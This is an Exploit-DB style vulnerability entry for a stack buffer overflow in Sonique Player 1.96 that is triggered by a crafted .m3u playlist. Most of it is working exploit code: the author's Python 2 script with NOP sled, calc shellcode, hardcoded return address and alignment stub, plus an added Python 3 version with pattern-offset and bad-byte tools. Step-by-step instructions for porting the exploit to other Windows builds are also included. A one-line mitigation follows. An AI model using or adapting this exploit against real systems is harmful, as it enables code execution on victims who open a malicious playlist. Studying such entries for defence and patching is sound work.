vendor: Sonique Player
by: Securityxxxpert
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Sonique Player
Affected Version From: 1.96
Affected Version To: 1.96
Patch Exists: Yes
Related CWE: N/A
CPE: a:sonique:sonique_player:1.96
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Sonique BOF EIP Overwrite

This entry covers Sonique Player version 1.96. A crafted .m3u playlist triggers a stack buffer overflow: the saved return address (EIP) sits 239 bytes into the file (a 93-byte NOP sled, the 16-byte calc shellcode and 130 bytes of filler), and the author lists 0x00, 0x83, 0x88 and 0x93 as bad ("pita") bytes. The exploit is not universal: the offset and the return address 0x5D109C6F were found on Windows XP SP3 English, so other builds need their own. Four NOPs follow the return address before a short stub that adds 0x1c to EBX and jumps to it, which the author added so the stack aligns without errors. When run, the script creates a directory named "Justin.Beiber -My World" and writes the malicious playlist waterbottle.m3u into it; opening that playlist in Sonique triggers the overflow. Note that the payload itself contains 0x93 (inside the shellcode) and 0x83 (in the alignment stub), both of which appear in the author's bad-byte list, so verify that list independently before reusing it.
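As an added example that is not part of the Exploit-DB entry or the author's script, the following Python 3 code reproduces the layout above as bytes and adds the two checks a practitioner wants before porting the exploit to another build: a Metasploit-style cyclic pattern (an equivalent of pattern_create/pattern_offset) for locating the EIP offset from a crash, and a scan of the finished payload for the listed bad bytes. The function names, the binary-mode writer and the 5000-byte default pattern length are my choices; the byte values are taken from the entry. Running it shows that the published payload contains two of the bytes the header lists as bad, which is something to reconcile before reuse.

```python
import struct

# Metasploit-style cyclic pattern (Aa0Aa1Aa2...), the same shape pattern_create.rb emits.
_UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
_LOWER = "abcdefghijklmnopqrstuvwxyz"
_DIGIT = "0123456789"
MAX_PATTERN = len(_UPPER) * len(_LOWER) * len(_DIGIT) * 3  # 20280 bytes before it repeats


def cyclic_pattern(length):
    """Return `length` bytes of the non-repeating pattern used to locate offsets."""
    if length > MAX_PATTERN:
        raise ValueError("pattern repeats after %d bytes" % MAX_PATTERN)
    out = bytearray()
    for u in _UPPER:
        for l in _LOWER:
            for d in _DIGIT:
                out += (u + l + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(crashed_eip, length=5000):
    """Offset in the pattern of the DWORD seen in EIP after a crash, or -1.

    `crashed_eip` is the value read from the debugger (e.g. 0x41347141); it is packed
    little-endian before searching, which is how it was laid out in the file.
    """
    return cyclic_pattern(length).find(struct.pack("<I", crashed_eip))


# Payload layout copied from the entry (hypothetical names, original byte values).
NOPSLED = b"\x90" * 93
SHELLCODE = b"\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"  # 16-byte calc shellcode
FILLER = b"\x90" * 130
RET_ADDR = 0x5D109C6F                     # Windows XP SP3 English only, per the author
ALIGN_JMP = b"\x83\xC3\x1C\x90\xFF\xE3"   # add ebx,0x1c ; nop ; jmp ebx
JUNK = b"\x42" * 10000
BAD_BYTES = frozenset(b"\x00\x83\x88\x93")  # the author's "pita bytes"


def build_payload(ret_addr=RET_ADDR):
    """Reproduce the .m3u body: sled | shellcode | filler | EIP | 4 NOPs | align+jmp | junk."""
    return (NOPSLED + SHELLCODE + FILLER + struct.pack("<I", ret_addr)
            + b"\x90" * 4 + ALIGN_JMP + JUNK)


def eip_offset(payload, ret_addr=RET_ADDR):
    """Byte offset of the return address inside the payload (the header says 239)."""
    return payload.find(struct.pack("<I", ret_addr))


def find_bad_bytes(payload, bad=BAD_BYTES):
    """List (offset, value) for every byte of `payload` that is in the bad-byte set."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def write_playlist(path, payload):
    """Write the playlist in binary mode so no byte is translated; returns bytes written."""
    with open(path, "wb") as fh:
        fh.write(payload)
    return len(payload)


if __name__ == "__main__":
    p = build_payload()
    print("EIP offset: %d" % eip_offset(p))
    for off, val in find_bad_bytes(p):
        region = ("shellcode" if 93 <= off < 109 else
                  "align stub" if 247 <= off < 253 else "other")
        print("bad byte 0x%02x at offset %d (%s)" % (val, off, region))
    # Simulate a crash with a pattern in place of the payload: the DWORD that lands in
    # EIP is the 4 bytes at offset 239, and pattern_offset recovers that offset.
    crash_dword = struct.unpack("<I", cyclic_pattern(300)[239:243])[0]
    print("pattern_offset(0x%08x) = %d" % (crash_dword, pattern_offset(crash_dword)))
```

To port the exploit, replace the payload with `cyclic_pattern(...)` of a length comfortably past the crash, read EIP from the debugger, feed it to `pattern_offset`, and then rebuild with `build_payload(ret_addr=...)` using an address valid on the target build; run `find_bad_bytes` on the result before writing it.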

Mitigation:

Update to the latest version of Sonique Player (the vendor has released a patch, per the entry above). Until then, do not open untrusted .m3u playlists in the affected version.

Exploit-DB raw data:

#Application: Sonique BOF EIP Overwrite
#Version:  1.96
#Author: Securityxxxpert
#Date Submitted:  May 17, 2011
#Download Link: http://www.tucows.com/preview/193562
#Tested on:  Windows XP SP3
#EIP Overwritten: 239 Bytes
#Pita Bytes:  0x00 0x83 0x88 0x93
#Notes:  Not universal, find your own offsets if not SP3 Eng
#Notes Cont:  4 Nops is added before aligning the stack in order to align the stack properly without errors
#Humor: Waterbottle + Justin Bieber's Head = Pwnage
# Python 2 script: string literals are byte strings, so the payload is written out verbatim.
import os

print "--------------------------------------------------------------------------------"
print "                                      Sonique Player Exploit                    "
print "                                      Retreat Hell!                             "
print "Greetz:  Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n   "
print "Greetz Cont: Connection, MaXe, ronin, Intern0t,                                  "
print "Greetz Cont:  Podjackel, g0tmi1k & The entire Corelan & Offensive Security Teams "
print "--------------------------------------------------------------------------------"

filename = "waterbottle.m3u"

nopsled = "\x90" * 93  # Sliding to pwnage
sc = ("\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0")  # 16 byte Calc Shellcode
filler = "\x90" * 130  # 93 + 16 + 130 = 239 bytes before the saved return address
eip = '\x6F\x9C\x10\x5D'  # 0x5D109C6F, little-endian
alignjmp = '\x83\xC3\x1c\x90' + '\xff\xe3'  # add ebx,0x1c ; nop ; jmp ebx -- aligns the stack to EBX+1c, then jumps to EBX *EBX1C*
Junk = '\x42' * 10000

exploit = nopsled + sc + filler + eip + "\x90" * 4 + alignjmp + Junk

os.makedirs("./Justin.Beiber -My World")
os.chdir("./Justin.Beiber -My World")
textfile = open(filename, "wb")  # binary mode so Windows does not translate any 0x0a in the payload
textfile.write(exploit)
textfile.close()